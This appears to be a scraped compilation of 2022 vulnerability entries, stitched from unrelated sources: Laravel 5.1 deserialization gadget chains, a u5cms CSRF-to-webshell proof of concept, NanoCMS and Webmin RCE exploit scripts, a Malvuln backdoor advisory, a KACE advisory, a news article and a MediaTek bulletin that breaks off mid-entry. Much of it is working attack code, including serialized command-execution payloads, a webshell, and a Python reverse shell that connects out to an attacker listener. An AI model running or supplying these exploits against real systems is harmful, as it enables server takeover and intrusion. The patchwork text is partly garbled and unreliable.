Laravel v5.1 was discovered to contain a remote code execution (RCE) vulnerability via the component ChanceGenerator in __call.

**Laravel 5.1 POP Chain 1-5**

composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"  
app/Http/Controllers/UsersController.php adding a controller UsersController

<?php
namespace App\\Http\\Controllers;
use Illuminate\\Http\\Request;
class UsersController extends Controller
{

    /\*\*
     \* 创建一个新用户。
     \*
     \* @param  Request  $request
     \* @return Response
     \*/
    public function store(Request $request)
    {  
        echo "Please post cmd to unserialize";

        $payload\=$request\->input("cmd");

        unserialize($payload);
        //
    }
}
?>

routes/web.php  
Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']);

<?php
use Illuminate\\Support\\Facades\\Route;
/\*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
\*/

Route\==post('/test',\[\\App\\Http\\Controllers\\UsersController\==class,'store'\]);

**0x01 RCE 1**

<?php
namespace Faker;
class ChanceGenerator{
    private $weight;
    protected $default;
    public function \_\_construct(){
	    $this\->weight\=0;
	    $this\->default\='calc.exe';
    }
}
namespace Faker;
class ValidGenerator{
    protected $generator;
    protected $validator;
    protected $maxRetries;
    public function \_\_construct(){
	    $this\->generator\=new ChanceGenerator();
	    $this\->validator\='system';
	    $this\->maxRetries\=1;
    }
}

namespace Illuminate\\Broadcasting;
use Faker\\ValidGenerator;
class PendingBroadcast{
	protected $events;
	public function \_\_construct(){
		$this\->events\=new ValidGenerator();
	}
}
echo urlencode(serialize(new PendingBroadcast));
?>

cmd=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A20%3A%22Faker%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%00%2A%00generator%22%3BO%3A21%3A%22Faker%5CChanceGenerator%22%3A2%3A%7Bs%3A29%3A%22%00Faker%5CChanceGenerator%00weight%22%3Bi%3A0%3Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A8%3A%22calc.exe%22%3B%7Ds%3A12%3A%22%00%2A%00validator%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00maxRetries%22%3Bi%3A1%3B%7D%7D  

**0x02 RCE2**

<?php
namespace Illuminate\\Validation;
class Validator{
	public $extensions = \[\];
	public function \_\_construct(){
		$this\->extensions\[''\]='call\_user\_func';
	}
}

namespace Illuminate\\Routing;
use Illuminate\\Validation\\Validator;
class PendingResourceRegistration{
	protected $registrar;
	protected $name;
	protected $controller;
	protected $options;
	public function \_\_construct(){
		$this\->name\='call\_user\_func';
		$this\->controller\='system';
		$this\->options\='whoami';
		$this\->registrar\=new Validator;
		}
}

**RCE 3**

<?php

namespace Illuminate\\Auth;
class RequestGuard{
	protected $provider;
	protected $callback;
	protected $request;
	public function \_\_construct(){
		$this\->callback = 'call\_user\_func';
		$this\->request = 'system';
		$this\->provider = 'calc.exe';
	}
}

namespace Illuminate\\View;
use Illuminate\\Auth\\RequestGuard;
class InvokableComponentVariable{
	protected $callable\=\[\];
	public function \_\_construct(){
		$this\->callable\=\[new RequestGuard,'user'\];
	}
}
namespace SebastianBergmann\\RecursionContext;
use Illuminate\\View\\InvokableComponentVariable;
final class Context{
	private $arrays = \[\];
	public function \_\_construct(){
		$this\->arrays\=new InvokableComponentVariable;
	}
}
echo urlencode(serialize(new Context));
?>

**RCE 4**

<?php
namespace Faker;
class DefaultGenerator{
	public $default;

}
namespace Carbon;
class Carbon{}

namespace Faker;
class Generator{
	protected $formatters = \[\];
	public function \_\_construct(){
		$this\->formatters\['huahua'\]='system';
	}
}

namespace Carbon;
use Carbon\\Carbon;
use Faker\\DefaultGenerator;
use Faker\\Generator;
class CarbonPeriod{
	protected $current;
	protected $dateClass;
	protected $filters = \[\];
	protected $key;
	public function \_\_construct(){
		$this\->dateClass\=new DefaultGenerator;
		$this\->dateClass\->default\=new DefaultGenerator;
		$this\->dateClass\->default\->default\='huahua';
		$this\->current\=new Carbon;
		$this\->filters\[\]\[\]=\[new Generator,'format'\];
		$this\->key\=array("calc.exe");
	}
}

namespace Illuminate\\View;
use Carbon\\CarbonPeriod;
class InvokableComponentVariable{
	protected $callable\=\[\];
	public function \_\_construct(){
		$this\->callable\=\[new CarbonPeriod,'valid'\];
	}
}
namespace SebastianBergmann\\RecursionContext;
use Illuminate\\View\\InvokableComponentVariable;
final class Context{
	private $arrays = \[\];
	public function \_\_construct(){
		$this\->arrays\=new InvokableComponentVariable;
	}
}
echo urlencode(serialize(new Context));
?>

**RCE 5**

<?php
namespace Faker;
class DefaultGenerator{
	public $default;

}
namespace Prophecy\\Doubler\\Generator;
use Faker\\DefaultGenerator;
class ClassCreator{
	private $generator;
	public function \_\_construct(){
		$this\->generator\=new DefaultGenerator;
		$this\->generator\->default\='phpinfo();';

	}

}

namespace Carbon;
class Carbon{}

namespace Prophecy\\Doubler\\Generator\\Node;
class ClassNode{}

namespace Carbon;
use Faker\\DefaultGenerator;
use Prophecy\\Doubler\\Generator\\ClassCreator;
use Prophecy\\Doubler\\Generator\\Node\\ClassNode;
class CarbonPeriod{
	protected $current;
	protected $dateClass;
	protected $filters = \[\];
	protected $key;
	public function \_\_construct(){
		$this\->dateClass\=new DefaultGenerator;
		$this\->dateClass\->default\=new DefaultGenerator;
		$this\->dateClass\->default\->default\='huahua';
		$this\->current\=new Carbon;
		$this\->filters\[\]\[\]=\[new ClassCreator,'create'\];
		$this\->key\=new ClassNode;
	}
}

namespace Illuminate\\View;
use Carbon\\CarbonPeriod;
class InvokableComponentVariable{
	protected $callable\=\[\];
	public function \_\_construct(){
		$this\->callable\=\[new CarbonPeriod,'valid'\];
	}
}
namespace SebastianBergmann\\RecursionContext;
use Illuminate\\View\\InvokableComponentVariable;
final class Context{
	private $arrays = \[\];
	public function \_\_construct(){
		$this\->arrays\=new InvokableComponentVariable;
	}
}
echo urlencode(serialize(new Context));
?>

CVE-2022-34943: Laravel5.1 Unserialize RCE · Issue #1 · beicheng-maker/vulns

Yuba u5cms v8.3.5 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component savepage.php. This vulnerability allows attackers to execute arbitrary code.

**Summary**

Vulnerability Type: Cross-Site Request Forgery  
Severity: High  
Estimated CVSS Score: 8.3 (https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)  
Vulnerable Page: u5admin/savepage.php  
Impacted version: At least 8.3.5 (but I think <= 10.1.13 are vulnerable too because of commit : "Initital import of version 8.3.5")

**Description**

The savepage.php page is vulnerable to a CSRF flaw that can lead to an RCE when using the ability to write PHP code within the CMS pages, if the victim/targeted user has the right privileges (ie. admin).

**Proof of Concept**

1.  The attacker craft the following malicious pages:

<html\>
  <body\>
    <form action\="https://u5cmsvulnerable.com/u5admin/savepage.php" method\="POST"\>
      <input type\="hidden" name\="page" value\="csrftorce" />
      <input type\="hidden" name\="ishomepage" value\="0" />
      <input type\="hidden" name\="content\_e" value\="&#91;h&#58;&#93;&#13;&#10;&lt;&#63;php&#13;&#10;&#13;&#10;if&#40;isset&#40;&#36;&#95;GET&#91;&apos;cmd&apos;&#93;&#41;&#41;&#13;&#10;&#32;&#32;&#32;&#32;&#123;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;system&#40;&#36;&#95;GET&#91;&apos;cmd&apos;&#93;&#41;&#59;&#13;&#10;&#32;&#32;&#32;&#32;&#125;&#13;&#10;&#63;&gt;&#13;&#10;&#91;&#58;h&#93;" />
      <input type\="hidden" name\="content\_d" value\="TODO" />
      <input type\="hidden" name\="content\_f" value\="TODO" />
      <input type\="hidden" name\="title\_e" value\="" />
      <input type\="hidden" name\="title\_d" value\="" />
      <input type\="hidden" name\="title\_f" value\="" />
      <input type\="hidden" name\="desc\_e" value\="" />
      <input type\="hidden" name\="desc\_d" value\="" />
      <input type\="hidden" name\="desc\_f" value\="" />
      <input type\="hidden" name\="key\_e" value\="" />
      <input type\="hidden" name\="key\_d" value\="" />
      <input type\="hidden" name\="key\_f" value\="" />
      <input type\="hidden" name\="logins" value\="" />
      <input type\="hidden" name\="hidden" value\="0" />
      <input type\="submit" value\="Submit request" />
    </form\>

    <script\>
      document.forms\[0\].submit();
    </script\>
  </body\>
</html\>

2.  The victim administrator click on the link and the autosubmit form is sent, the malicious pages is created with the following content (en lang here):

    [h:]
    <?php
    
    if(isset($_GET['cmd']))
        {
            system($_GET['cmd']);
        }
    ?>
    [:h]
    

4.  The attacker can now have RCE (here a PHP webshell) on the webserver:

**Remediation**

u5cms should implement token protection against CSRF attack (https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site\_Request\_Forgery\_Prevention\_Cheat\_Sheet.html)

CVE-2022-34937: CSRF can lead to RCE if admin is targeted · Issue #51 · u5cms/u5cms

An issue was discovered in bgpd in FRRouting (FRR) 8.3. In bgp_notify_send_with_data() and bgp_process_packet() in bgp_packet.c, there is a possible use-after-free due to a race condition. This could lead to Remote Code Execution or Information Disclosure by sending crafted BGP packets. User interaction is not needed for exploitation.

poc for uaf

Увійти

Файл

Змінити

Вигляд

Інструменти

Довідка

CVE-2022-37035: poc for uaf

A SQL injection vulnerability exists within Quest KACE Systems Management Appliance (SMA) through 12.0 that can allow for remote code execution via download_agent_installer.php.

Zurück

Feedback übermittelt

Konnten Sie mithilfe dieses Artikels ein Problem lösen?

  Bewertung auswählen

*   **Titel**
    
    Quest response to KACE SMA vulnerabilities: CVE-2022-29807
    
*   **Beschreibung**
    
    The Quest team has been made aware regarding a vulnerability involving the KACE System Management Appliance product below:
    
    CVE-2022-29807 - SQL Injection
    
    Quest takes handling of vulnerabilities seriously, and we investigate and respond to all reported potential vulnerabilities. Our vulnerability reporting and response process can be found here. 
    
*   **Ursache**
    
    CVE-2022-29807: A SQL injection vulnerability exists within Quest KACE Systems Management Appliance (SMA) through 12.0 that can allow for remote code execution.
    
*   **Lösung**
    
    The KACE SMA vulnerability reported under CVE-2022-29807 is resolved in version 12.1.168 of the KACE Systems Management Appliance, available for download here.
    

Feedback übermittelt

Konnten Sie mithilfe dieses Artikels ein Problem lösen?

  Bewertung auswählen

Request a KB Article

**Leave a Comment**

Um Kommentare absenden zu können, müssen Sie oben eine Bewertung von 1 bis 5 Sternen auswählen

Produkt(e):

**KACE Asset Management Appliance**  
12.1, 12.0, 11.1, 11.0

**KACE Service Desk**  
12.1, 12.0, 11.1, 11.0

**KACE Systems Management Appliance**  
12.1, 12.0, 11.1, 11.0

**KACE as a Service**  
12.1, 12.0, 11.1, 11.0

Thema/Themen:

Configuration

Artikelhistorie:

Erstellt am: 4/25/2022  
Letzte Aktualisierung am: 8/1/2022

Author:

Laura Carcamo

CVE-2022-29807: Quest response to KACE SMA vulnerabilities: CVE-2022-29807 (338162)

Evolution CMS, FUDForum, and GitBucket vulnerabilities chained for maximum impact

Evolution CMS, FUDForum, and GitBucket vulnerabilities chained for maximum impact

Researchers have released details on a trio of cross-site scripting (XSS) vulnerabilities in popular open source apps that could lead to remote code execution (RCE).

The security bugs, found by a research team from PT Swarm, were discovered in web development applications Evolution CMS, FUDForum, and GitBucket.

A traditional XSS attack allows the attacker’s JavaScript code to be executed in the victim user’s browser, opening the door to cookie theft, redirection to a phishing site, and much more.

Web security researcher Aleksey Solovev told The Daily Swig that this research, detailed in PT Swarm’s blog, relates to how “the combination of the discovered possibility of conducting an XSS attack and the built-in file manager (or executing a SQL query) in the administrator panel can lead to a complete compromise of the system”.

**Triple threat**

The first vulnerability, in Evolution CMS v3.1.8, could allow an attacker to carry out a reflected XSS attack in several places in the admin panel.

“An attacker could try to force a system administrator to follow a malicious link through social engineering, which would lead to the execution of malicious JavaScript code in the browser of the attacked,” Solovev told The Daily Swig.

“The consequence would be a complete compromise of the system by overwriting the executable file using the built-in file manager.”

Read more of the latest web security research here

A second flaw, found in FUDforum v3.1.1, could potentially allow a malicious actor to carry out a stored XSS attack in the name of the attached file in private messages.

“An attacker could send a private message to an administrator with a malicious payload in the name of the attached file,” said Solovev.

“When this message is read by the administrator, his browser would execute the JavaScript code and, using the built-in file manager, an executable file would be created that would allow the attacker to execute commands on the server.”

Finally, in GitBucket v4.37.1, a security bug was discovered that could enable an attacker to carry out a stored XSS attack in “several places”, according to Solovev.

An attacker had to create an issue in a public repository and inject a JavaScript code into the name of the assignment.

This event would be displayed in the general feed and the attacker’s profile. It was in these places that the insecure display of the task name with a malicious load was present, which led to the execution of JavaScript code in the browser of everyone who viewed these pages.

“In the admin panel, it was possible to execute SQL code based on the H2 Database Engine, for which there is already an exploit that allows you to execute a command on the server,” Solovev explained.

“Putting everything together, an attacker could attack the administrator and gain the ability to execute commands on the server.”

**Patches released**

All three vulnerabilities are pending a CVE but have been patched by the maintainers of the projects, Solovev told The Daily Swig.

The researcher added that the main difficulty in discovering these flaws was to find the possibility of conducting an XSS attack.

“The rest of the steps were easier because they had public exploits for legitimate functionality in the form of a file manager in the admin panel,” he explained.

More information about the vulnerabilities and technical detail on the exploit can be found in PT Swarm’s blog.

YOU MAY ALSO LIKE GitHub Actions workflow flaws provided write access to projects including Logstash

Trio of XSS bugs in open source web apps could lead to complete system compromise

PyroCMS v3.9 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities.

CVE-2022-35118: AARO-Bugs/AARO-CVE-List.md at master · Accenture/AARO-Bugs

NanoCMS version 0.4 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-07-26# Exploit Auuthor: p1ckzi# Vendor Homepage: https://github.com/kalyan02/NanoCMS# Version: NanoCMS v0.4# Tested on: Linux Mint 20.3# CVE: N/A## Description:# this script uploads a php reverse shell to the target.# NanoCMS does not sanitise the data of an authenticated user while creating# webpages. pages are saved with .php extensions by default, allowing an# authenticated attacker access to the underlying system:# https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt#!/usr/bin/env python3import argparseimport bs4import errnoimport reimport requestsimport secretsimport sysdef arguments():    parser = argparse.ArgumentParser(        formatter_class=argparse.RawDescriptionHelpFormatter,        description=f"{sys.argv[0]} exploits authenticated file upload"        "\nand remote code execution in NanoCMS v0.4",        epilog=f"examples:"        f"\n\tpython3 {sys.argv[0]} http://10.10.10.10/ rev.php"        f"\n\tpython3 {sys.argv[0]} http://hostname:8080 rev-shell.php -a"        f"\n\t./{sys.argv[0]} https://10.10.10.10 rev-shell -n -e -u 'user'"    )    parser.add_argument(        "address", help="schema/ip/hostname, port, sub-directories"        " to the vulnerable NanoCMS server"    )    parser.add_argument(        "file", help="php file to upload"    )    parser.add_argument(        "-u", "--user", help="username", default="admin"    )    parser.add_argument(        "-p", "--passwd", help="password", default="demo"    )    parser.add_argument(        "-e", "--execute", help="attempts to make a request to the uploaded"        " file (more useful if uploading a reverse shell)",        action="store_true", default=False    )    parser.add_argument(        "-a", "--accessible", help="turns off features"        " which may negatively affect screen readers",        action="store_true", default=False    )    parser.add_argument(        "-n", "--no-colour", help="removes colour output",        action="store_true", default=False    )    arguments.option = parser.parse_args()# settings for terminal output defined by user in term_settings().class settings():    # colours.    c0 = ""    c1 = ""    c2 = ""    # information boxes.    i1 = ""    i2 = ""    i3 = ""    i4 = ""# checks for terminal setting flags supplied by arguments().def term_settings():    if arguments.option.accessible:        small_banner()    elif arguments.option.no_colour:        settings.i1 = "[+] "        settings.i2 = "[!] "        settings.i3 = "[i] "        settings.i4 = "$ "        banner()    elif not arguments.option.accessible or arguments.option.no_colour:        settings.c0 = "\u001b[0m"       # reset.        settings.c1 = "\u001b[38;5;1m"  # red.        settings.c2 = "\u001b[38;5;2m"  # green.        settings.i1 = "[+] "        settings.i2 = "[!] "        settings.i3 = "[i] "        settings.i4 = "$ "        banner()    else:        print("something went horribly wrong!")        sys.exit()# default terminal banner (looks prettier when run lol)def banner():    print(        "\n                                                  .__           .__"        "  .__   "        "\n  ____ _____    ____   ____   ____   _____   _____|  |__   ____ |  "        "| |  |  "        "\n /    \\__   \\  /    \\ /  _ \\_/ ___\\ /     \\ /  ___/  |  \\_/ "        "__ \\|  | |  |  "        "\n|   |  \\/ __ \\|   |  (  <_> )  \\___|  Y Y  \\___  \\|   Y  \\  _"        "__/|  |_|  |__"        "\n|___|  (____  /___|  /\\____/ \\___  >__|_|  /____  >___|  /\\___  "        ">____/____/"        "\n     \\/     \\/     \\/            \\/      \\/     \\/     \\/   "        "  \\/"    )def small_banner():    print(        f"{sys.argv[0]}"        "\nNanoCMS authenticated file upload and rce..."    )# appends a '/' if not supplied at the end of the address.def address_check(address):    check = re.search('/$', address)    if check is not None:        print('')    else:        arguments.option.address += "/"# creates a new filename for each upload.# errors occur if the filename is the same as a previously uploaded one.def random_filename():    random_filename.name = secrets.token_hex(4)# note: after a successful login, credentials are saved, so further reuse# of the script will most likely not require correct credentials.def login(address, user, passwd):    post_header = {        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "        "Gecko/20100101 Firefox/91.0",        "Accept": "text/html,application/xhtml+xml,"        "application/xml;q=0.9,image/webp,*/*;q=0.8",        "Accept-Language": "en-US,en;q=0.5",        "Accept-Encoding": "gzip, deflate",        "Content-Type": "application/x-www-form-urlencoded",        "Content-Length": "",        "Connection": "close",        "Referer": f"{arguments.option.address}data/nanoadmin.php",        "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",        "Upgrade-Insecure-Requests": "1",    }    post_data = {        "user": f"{user}",        "pass": f"{passwd}"    }    url_request = requests.post(        address + 'data/nanoadmin.php?',        headers=post_header,        data=post_data,        verify=False,        timeout=30    )    signin_error = url_request.text    if 'Error : wrong Username or Password' in signin_error:        print(            f"{settings.c1}{settings.i2}could "            f"sign in with {arguments.option.user}/"            f"{arguments.option.passwd}.{settings.c0}"        )        sys.exit(1)    else:        print(            f"{settings.c2}{settings.i1}logged in successfully."            f"{settings.c0}"        )def exploit(address, file, name):    with open(arguments.option.file, 'r') as file:        file_contents = file.read().rstrip()    post_header = {        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "        "Gecko/20100101 Firefox/91.0",        "Accept": "text/html,application/xhtml+xml,"        "application/xml;q=0.9,image/webp,*/*;q=0.8",        "Accept-Language": "en-US,en;q=0.5",        "Accept-Encoding": "gzip, deflate",        "Content-Type": "application/x-www-form-urlencoded",        "Content-Length": "",        "Connection": "close",        "Referer": f"{arguments.option.address}data/nanoadmin.php?action="        "addpage",        "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",        "Upgrade-Insecure-Requests": "1",    }    post_data = {        "title": f"{random_filename.name}",        "save": "Add Page",        "check_sidebar": "sidebar",        "content": f"{file_contents}"    }    url_request = requests.post(        address + 'data/nanoadmin.php?action=addpage',        headers=post_header,        data=post_data,        verify=False,        timeout=30    )    if url_request.status_code == 404:        print(            f"{settings.c1}{settings.i2}{arguments.option.address} could "            f"not be uploaded.{settings.c0}"        )        sys.exit(1)    else:        print(            f"{settings.c2}{settings.i1}file posted."            f"{settings.c0}"        )    print(        f"{settings.i3}if successful, file location should be at:"        f"\n{address}data/pages/{random_filename.name}.php"    )def execute(address, file, name):    print(            f"{settings.i3}making web request to uploaded file."    )    print(            f"{settings.i3}check listener if reverse shell uploaded."        )    url_request = requests.get(        address + f'data/pages/{random_filename.name}.php',        verify=False    )    if url_request.status_code == 404:        print(            f"{settings.c1}{settings.i2}{arguments.option.file} could "            f"not be found."            f"\n{settings.i2}antivirus may be blocking your upload."            f"{settings.c0}"        )    else:        sys.exit()def main():    try:        arguments()        term_settings()        address_check(arguments.option.address)        random_filename()        if arguments.option.execute:            login(                arguments.option.address,                arguments.option.user,                arguments.option.passwd            )            exploit(                arguments.option.address,                arguments.option.file,                random_filename.name,            )            execute(                arguments.option.address,                arguments.option.file,                random_filename.name,            )        else:            login(                arguments.option.address,                arguments.option.user,                arguments.option.passwd            )            exploit(                arguments.option.address,                arguments.option.file,                random_filename.name,            )    except KeyboardInterrupt:        print(f"\n{settings.i3}quitting.")        sys.exit()    except requests.exceptions.Timeout:        print(            f"{settings.c1}{settings.i2}the request timed out "            f"while attempting to connect.{settings.c0}"        )        sys.exit()    except requests.ConnectionError:        print(            f"{settings.c1}{settings.i2}could not connect "            f"to {arguments.option.address}{settings.c0}"        )        sys.exit()    except FileNotFoundError:        print(            f"{settings.c1}{settings.i2}{arguments.option.file} "            f"could not be found.{settings.c0}"        )    except (        requests.exceptions.MissingSchema,        requests.exceptions.InvalidURL,        requests.exceptions.InvalidSchema    ):        print(            f"{settings.c1}{settings.i2}a valid schema and address "            f"must be supplied.{settings.c0}"        )        sys.exit()if __name__ == "__main__":    main()

NanoCMS 0.4 Remote Code Execution

Backdoor.Win32.Destrukor.20 malware suffers from authentication bypass and code execution vulnerabilities.

**Backdoor.Win32.Destrukor.20 MVID-2022-0626 Authentication Bypass / Code Execution**

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/c790749f851d48e66e7d59cc2e451956.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Destrukor.20Vulnerability: Authentication Bypass Description: The malware listens on TCP port 6969. However, after sending a specific cmd "rozmiar" the backdoor returns "moznasciagac" in Polish "you can download" and port 21 opens. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution.Family: DestrukorType: PE32MD5: c790749f851d48e66e7d59cc2e451956Dropped files: sys32.exeVuln ID: MVID-2022-0626Disclosure: 07/30/2022Exploit/PoC:C:\>nc64.exe 192.168.18.125 6969rozmiar moznasciagacC:\>nc64.exe 192.168.18.125 21220 ICS FTP Server ready.USER malvuln331 Password required for malvuln.PASS malvuln230 User malvuln logged in.SYST215 UNIX Type: L8 Internet Component SuiteCDUP \250 CWD command successful. "C:/" is current directory.MKD HATE257 'C:\HATE': directory created.PASV227 Entering Passive Mode (192,168,18,125,232,131).STOR DOOM.exe150 Opening data connection for DOOM.exe.226 File received okfrom socket import *MALWARE_HOST="192.168.18.125"PORT=59523DOOM="DOOM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Destrukor.20 MVID-2022-0626 Authentication Bypass / Code Execution

Webmin version 1.996 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-07-25# Exploit Author: Emir Polat# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165# Vendor Homepage: https://www.webmin.com/# Software Link: https://www.webmin.com/download.html# Version: < 1.997# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)# CVE: CVE-2022-36446import argparseimport requestsfrom bs4 import BeautifulSoupdef login(args):    global session    global sysUser    session = requests.Session()    loginUrl = f"{args.target}:10000/session_login.cgi"    infoUrl = f"{args.target}:10000/sysinfo.cgi"    username = args.username    password = args.password    data = {'user': username, 'pass': password}    login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})    sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']})    bs = BeautifulSoup(sysInfo.text, 'html.parser')    sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs]    if sysUser:        return True    else:        return Falsedef exploit(args):    payload = f"""    1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport}));    os.dup2(s.fileno(),0);    os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")');    """    updateUrl = f"{args.target}:10000/package-updates"    exploitUrl = f"{args.target}:10000/package-updates/update.cgi"    exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'}    if login(args):        print("[+] Successfully Logged In !")        print(f"[+] Session Cookie => sid={session.cookies['sid']}")        print(f"[+] User Found  => {sysUser[0]}")        res = session.get(updateUrl)        bs = BeautifulSoup(res.text, 'html.parser')        updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]        if updateAccess[0] == "package-updates":            print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>")            print(f"[+] Exploit starting ... ")            print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}")            session.headers.update({'Referer'  : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})            session.post(exploitUrl, data=exploitData)        else:            print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>")    else:        print("[-] Login Failed !")if __name__ == '__main__':    parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)")    parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)    parser.add_argument('-u', '--username', help='Username For Login', required=True)    parser.add_argument('-p', '--password', help='Password For Login', required=True)    parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)    parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)    parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False)    args = parser.parse_args()    exploit(args)

Webmin 1.996 Remote Code Execution

In scp, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06988728; Issue ID: ALPS06988728.

**August 2022 Product Security Bulletin**

Published 2022-08-01

The MediaTek Product Security Bulletin contains details of security vulnerabilities affecting MediaTek Smartphone, Tablet, AIoT, Smart display, Smart platform, OTT and NBIoT chipsets. Device OEMs have been notified of all the issues and the corresponding security patches for at least two months before publication.

The severity of the identified vulnerabilities was conducted based on the Common Vulnerability Scoring System version 3.1 (CVSS v3.1).

****Summary****

Severity

**CVEs**

High

CVE-2022-26437

Medium

CVE-2022-21789, CVE-2022-21790, CVE-2022-21791, CVE-2022-21792, CVE-2022-26426, CVE-2022-26427, CVE-2022-26428, CVE-2022-26429, CVE-2022-21788, CVE-2022-26430, CVE-2022-26431, CVE-2022-26432, CVE-2022-26433, CVE-2022-26434, CVE-2022-26435, CVE-2022-26436, CVE-2022-26438, CVE-2022-26439, CVE-2022-26440, CVE-2022-26441, CVE-2022-26442, CVE-2022-26443, CVE-2022-26444, CVE-2022-26445

****Details****

CVE

**CVE-2022-26437**

Title

Out-of-bounds write in httpclient

Severity

High

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In httpclient, there is a possible out of bounds write due to uninitialized data. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT2621, MT2625

Affected Software Versions

NBIOT SDK V2.8.1

CVE

**CVE-2022-21789**

Title

Concurrent execution using shared resource with improper synchronization ('race condition') in audio ipi

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Description

In audio ipi, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6779, MT6781, MT6785, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8791, MT8797, MT8798

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21790**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6893

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21791**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6885, MT6893

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21792**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6883, MT6885, MT6889, MT6893

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-26426**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

